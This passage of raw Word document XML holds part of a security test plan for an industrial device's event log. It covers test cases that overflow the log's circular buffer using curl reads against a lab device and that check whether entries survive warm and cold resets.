          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="705C8D19" w14:textId="77777777" w:rsidR="00B91A42" w:rsidRDefault="0005196E" w:rsidP="0005196E">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05196E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS against the requirement if the log retains all events for the retention window. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58A98D20" w14:textId="1CE7BB69" w:rsidR="00530E8C" w:rsidRPr="00EC056D" w:rsidRDefault="0005196E" w:rsidP="0005196E">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05196E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected = FAIL: the buffer caps at its fixed size and overwrites oldest-first </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DE7B9C4" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRPr="00AF57B2" w:rsidRDefault="00530E8C" w:rsidP="00530E8C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DCE4B47" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00530E8C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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530E8C" w14:paraId="1DED9B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2AA9AD" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05BC253F" w14:textId="77777777" w:rsidR="00530E8C"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530E8C" w14:paraId="187F6FA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7C3777" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B68A49A" w14:textId="38A27A08" w:rsidR="00530E8C" w:rsidRPr="006E4D50" w:rsidRDefault="00481EFE" w:rsidP="00481EFE">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TC-RQ012-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530E8C" w:rsidRPr="00EE7A74" w14:paraId="1F3C6B5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BEB2CFC" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72FDA2AC" w14:textId="77777777" w:rsidR="00684F13" w:rsidRPr="006E4D50" w:rsidRDefault="00684F13"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DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3496FB88" w14:textId="10283ECB" w:rsidR="00530E8C" w:rsidRPr="006E4D50" w:rsidRDefault="00684F13"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Pi mgmt eth1 = 192.168.50.10; OT path to induce events</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530E8C" w:rsidRPr="00EE7A74" w14:paraId="223303B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EFE29E" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CC239DF" w14:textId="0FCAA71D" w:rsidR="00530E8C" w:rsidRPr="006E4D50" w:rsidRDefault="00CB7A9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curl (log read), scripted event generator (brief repeated SysCom interruptions / recoverable channel faults), diff tooling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530E8C" w:rsidRPr="00EE7A74" w14:paraId="2FEBE8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2360CC" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="558082FF"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17"/>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># TC-RQ012-01 Overflow the circular buffer and confirm oldest-first overwrite</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E2E5B7C"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curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC1201_log_00.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13787EA3"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 induce ~120 individually-tagged loggable events (exceeds &gt;=100 capacity) ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="109EFDD9"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for i in $(seq 1 120); do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E7D1E03"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./induce_event.sh $i # trigger a benign, recoverable, acknowledgeable event #i</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60F52B0F"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if (( i % 20 == 0 )); then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3881D3B6"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curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC1201_log_$i.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67A3D138"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fi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="129E44F6"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done</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CC84F42"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python3 analyse_overflow.py TC1201_log_*.json | tee TC1201_overflow.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AD59CC4" w14:textId="0B95722B" w:rsidR="00530E8C"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analyse: entry count never exceeds capacity; earliest tags disappear (overwritten)</w:t>
            </w:r>
            <w:commentRangeEnd w:id="17"/>
            <w:r w:rsidR="00F0672F" w:rsidRPr="006E4D50">
              <w:rPr>
                <w:rStyle w:val="Kommentarzeichen"/>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:commentReference w:id="17"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530E8C" w:rsidRPr="00EE7A74" w14:paraId="74F5E68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3A431C" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A9BC588" w14:textId="1556C6B4" w:rsidR="00530E8C" w:rsidRPr="006E4D50" w:rsidRDefault="00E0703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Entry count plateaus at the fixed capacity (≥100); earliest events overwritten (circular buffer, SRIO-10663).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530E8C" w:rsidRPr="00AD4B09" w14:paraId="781D47D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89A512B" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73289D09" w14:textId="0BE90972" w:rsidR="00530E8C" w:rsidRPr="006E4D50" w:rsidRDefault="009548E7"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6E4D50">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Buffer caps + overwrites oldest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530E8C" w:rsidRPr="00EE7A74" w14:paraId="23CC24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65B1B8B" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="669957DA" w14:textId="6A42349D" w:rsidR="00530E8C" w:rsidRPr="006E4D50" w:rsidRDefault="00F0672F"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TC1201_log_*.json series, TC1201_overflow.txt, entry-count-vs-events plot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AC4343F" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3DF545" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CD6016B" w14:textId="0B07AF7B" w:rsidR="00530E8C" w:rsidRDefault="003440FB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E57282">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ012-02 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00E57282">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reset-Behaviour Matrix: Cold-Start Deletion &amp; Warm-Reset Clarification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D809DA6" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00D90BE6">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D90BE6" w14:paraId="5EA15DB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2CEDA0" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28A50AF0" w14:textId="77777777" w:rsidR="00D90BE6"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D90BE6" w14:paraId="4B4DF93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9649F1" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="739F8F6B" w14:textId="1CF9B80B" w:rsidR="00D90BE6" w:rsidRPr="00EC056D" w:rsidRDefault="009C7226" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="5097"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C7226">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ012-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D90BE6" w:rsidRPr="00AB1D3A" w14:paraId="543D822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95EFB91" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1BE5A6D2" w14:textId="619EC296" w:rsidR="00D90BE6" w:rsidRPr="00AB1D3A" w:rsidRDefault="000920B0" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000920B0">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t>RQ-012 → CR 3.9 / CR 2.9 → Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D90BE6" w:rsidRPr="00D67CA6" w14:paraId="0070D32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B71764" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49092F85" w14:textId="773AB0EE" w:rsidR="00D90BE6" w:rsidRPr="00EC056D" w:rsidRDefault="005D339B" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="4549"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D339B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Repudiation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (+Tampering)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D90BE6" w14:paraId="24AB492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360CD0C" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33A6E4FB" w14:textId="53CD15DD" w:rsidR="00D90BE6" w:rsidRPr="00EC056D" w:rsidRDefault="00BE3C62"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E3C62">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-2 (Threat-Mitigation Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D90BE6" w:rsidRPr="00EE7A74" w14:paraId="7064BCE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235C03" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="198DCFAC" w14:textId="12254EB1" w:rsidR="00D90BE6" w:rsidRPr="00EC056D" w:rsidRDefault="0005526D" w:rsidP="0005526D">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>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05526D">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that a cold start clears the tracing log (intervention data does not persist across a power cycle) and empirically establish the warm-reset behaviour (undocumented), settling the "survives non-cold-start resets" question.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D90BE6" w:rsidRPr="00EE7A74" w14:paraId="0488677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3B06F7E" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A898181" w14:textId="77777777" w:rsidR="0073007C" w:rsidRDefault="0073007C" w:rsidP="0073007C">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>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t xml:space="preserve">Populate the log with identifiable entries. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D5AC3F7" w14:textId="77777777" w:rsidR="0073007C" w:rsidRDefault="0073007C" w:rsidP="0073007C">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>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lastRenderedPageBreak/>
              <w:t xml:space="preserve">Apply a warm reset (if a warm-reset path exists); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23A546EB" w14:textId="3DE4609A" w:rsidR="0073007C" w:rsidRDefault="0073007C" w:rsidP="0073007C">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:ind w:left="720"/>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t>read the log.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C629B16" w14:textId="77777777" w:rsidR="0073007C" w:rsidRDefault="0073007C" w:rsidP="0073007C">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>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t xml:space="preserve">Apply a cold start (power cycle); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77B9FBE8" w14:textId="26E3CE00" w:rsidR="0073007C" w:rsidRDefault="0073007C" w:rsidP="0073007C">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:ind w:left="720"/>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t xml:space="preserve">read the log. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02B212D0" w14:textId="3501F369" w:rsidR="00D90BE6" w:rsidRPr="0073007C" w:rsidRDefault="0073007C" w:rsidP="0073007C">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>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t>Compare: confirm cold-start clearing; record whether warm reset preserves entries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D90BE6" w:rsidRPr="00EE7A74" w14:paraId="4854A0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F61905" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06B568F6" w14:textId="77777777" w:rsidR="001D7D87" w:rsidRDefault="001D7D87" w:rsidP="00655E93">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1D7D87">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS against the requirement if entries persist across both reset types. Expected = FAIL for cold start: the log is empty after cold start </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F2ACF04" w14:textId="7FAF64A7" w:rsidR="00D90BE6" w:rsidRPr="00EC056D" w:rsidRDefault="001D7D87" w:rsidP="00655E93">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1D7D87">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Warm-reset result recorded factually</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71AD663A" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRPr="00AF57B2" w:rsidRDefault="00D90BE6" w:rsidP="00D90BE6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2437B4A3" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00D90BE6">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D90BE6" w14:paraId="21569511"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19848B" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55FE8C3B" w14:textId="77777777" w:rsidR="00D90BE6"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D90BE6" w14:paraId="2AEF43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A17AA8" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AEB2B76" w14:textId="0B0FBC77" w:rsidR="00D90BE6" w:rsidRPr="006E4D50" w:rsidRDefault="00AA1BD5"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TC-RQ012-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D90BE6" w:rsidRPr="00EE7A74" w14:paraId="6DDBC4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7EC4D39" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A2D7D79" w14:textId="77777777" w:rsidR="004F1D67" w:rsidRPr="006E4D50" w:rsidRDefault="004F1D6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DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25D3EA98" w14:textId="77777777" w:rsidR="004F1D67" w:rsidRPr="006E4D50" w:rsidRDefault="004F1D6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Pi mgmt eth1 = 192.168.50.10; </w:t>
            </w:r>
          </w:p>
